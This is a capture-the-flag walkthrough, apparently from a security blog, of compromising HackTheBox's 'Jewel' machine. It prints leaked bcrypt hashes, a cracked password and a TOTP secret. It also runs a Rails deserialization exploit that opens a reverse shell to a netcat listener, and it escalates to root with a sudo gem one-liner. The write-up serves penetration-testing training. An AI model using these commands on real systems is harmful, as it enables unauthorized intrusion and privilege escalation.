Today we are going to crack a machine called Jewel. It was created by polarbearer. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
·
Network Scanning
o
Nmap Scan
·
Enumeration
o
Enumerating HTTP Service on
8000
o
Enumerating Database File
o
Extracting Password hashes
o
Cracking hash using John the
Ripper
o
Enumerating the Gemfile
o
Searching for CVE
·
Exploitation
o
Enumerating the Deserialization
Vulnerability
o
Searching for an Exploit
o
Running the Exploit
o
Getting shell as bill user
o
Reading User Flag
·
Privilege Escalation
o
Enumerating Authenticator file
o
Using Online Authenticator for
getting TOTP
o
Enumerating Sudo Permissions
o
Exploiting permissions on Gem
o
Getting Root Shell
o
Reading the Root Flag
Walkthrough
Network Scanning
To Attack any machine, we need the IP
Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned: 10.129.104.163
Now that we have the IP Address. We need to
enumerate open ports on the machine. For this, we will be running a nmap scan.
nmap -sC 10.129.104.163
The Nmap Version scan quickly gave us some
great information. It positively informed that SSH (22), HTTP (8000) and HTTP
Proxy (8080) service is running on the machine. We can see that the service on
8000 is redirected to gitweb. It is worth a look.
Enumeration
We do not posses the credentials for the
SSH login so we will be moving over to the HTTP service for Enumeration. We
open the HTTP service on the Web Browser to find that it was running Git web
interface. It is basically a web Version of interacting with the git documents
and files. We found one file inside the projects directory. We click on the
.git to advance further.
http://10.129.104.163:8000/gitweb/
We move further to find a log directory. It
contained one commit. Clicking on the Commit link we are presented the list of
files inside the commit. In this we find a bd.sql file. It seemed interesting.
We click on the bd.sql file to find the
database file. It contained two users and their password hashes. We copied the
hash values and created two files each by the name of the user they belong to.
bill
bill@mail.htb $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
jennifer jennifer@mail.htb
$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
We got two files bill and jennifer. We used
the rockyou dictionary with John the Ripper to try and crack the hash. After
taking huge amount of time and multiple failures it was able to crack the
password for the user bill. It was not able to crack the one for Jennifer. We
now have the password for the user bill.
john -w=/usr/share/wordlists/rockyou.txt
bill
We tried to use the newly cracked password
on the SSH service but were unsuccessful. This made us think that this
credential would be usable at another point down the road. Moving back to the
gitweb we found. We enumerated it further to find that Gemfile. It almost
always contains the version information regarding the Ruby Applications. Upon
reading we found that the application is running Ruby 2.5.5 and Rails 5.2.2.1.
Time to search for exploits.
We googled the versions with the CVE
keyword to find CVE MITRE article. It usually contains the list of all the
vulnerabilities that particular version is at risk of.
Exploitation
We see a bunch of vulnerabilities. First
one requires PostgreSQL, we didn’t find any evidence that it is installed on
the target server. Then there is a Denial-of-Service Attack. We do not want to
DoS the server. Then we have a bunch of CSRF vulnerabilities, but through our
enumerations we found that a scenario is not building up for a successful CSRF
attack. Last we came across the Deserialization. This seemed of some interest.
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=rails
We googled for any ready exploit for this
CVE and we were in luck. Some user has already created an exploit that gives
shell directly. Surprisingly it was the third link in a Google Search. You can
find the exploit by clicking here.
We browsed the Git of that exploit and read
the code to understand the working. We found that it takes the Target IP
Address and then browses it, then creates a user by the name of doctor. Then
uses the credentials of the newly created user to login. This gives it an
Authentication Token. Then it browses the Profile Update section of the
Application and then it Inputs a serialized shell script inside and send it to
the target server. Due to the vulnerability, the server thinks it is genuine
serialized code so it extracts it and then when it gets the shell invocation
command. It feels that it is genuine instruction as well. So, it executes it.
To run this exploit, you will need the Target IP Address, Local IP Address and
a Local Port. We provided all these and started a listener on the port
specified.
Here, we have the following configurations
raj.py: Exploit script name
10.129.104.163: Remote Host
10.10.14.48: Local Host
1234: Local Port
python3 raj.py 10.129.104.163
10.10.14.48 1234
In a few moments, we see that we have a
shell of the user bill. We start our enumeration of the user flag and found it
inside the home directory of bill user. We read the user flag.
nc -lvp 1234
ls -la
cat user.txt
Privilege Escalation
Now we see that a hidden file by the name
of .google_authenticator. This seems
interesting. We read it to find a code inside of it. Holding the thought for
the authenticator code, we decided to run the sudo -l to enumerate the binaries
that we can execute with elevated privileges. It asks us for the password of
user bill. We cracked that earlier. We enter spongebob as bill’s password. Then
it asks us for a verification code. This means that google authenticator is not
a rabbit hole. We need to setup an authenticator using the code provided to us.
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
sudo -l
python -c 'import
pty;pty.spawn("bash")'
sudo -l
spongebob
We searched for an authenticator, it
provided us with various plugins but we are bit clingy to not put a plugin on
our browser. We found a TOTP Token Generator. All it required was the code that
we found and it provided us with the TOTP which we can use.
We ran the sudo -l again and this time we
entered the code it asks for and we found that we can execute gem. Lucky for us
that gem is one of the LOLBINs. Means it can be directly exploited using a
single line of code.
sudo -l
spongebob
104007
We head to LOLBINs website and found the
one liner code to exploit the sudo permissions on gem. It gave us root in no
time. This concludes this machine.
sudo gem open -e "/bin/sh -c
/bin/sh" rdoc
id
cd /root
cat root.txt
0 comments:
Post a Comment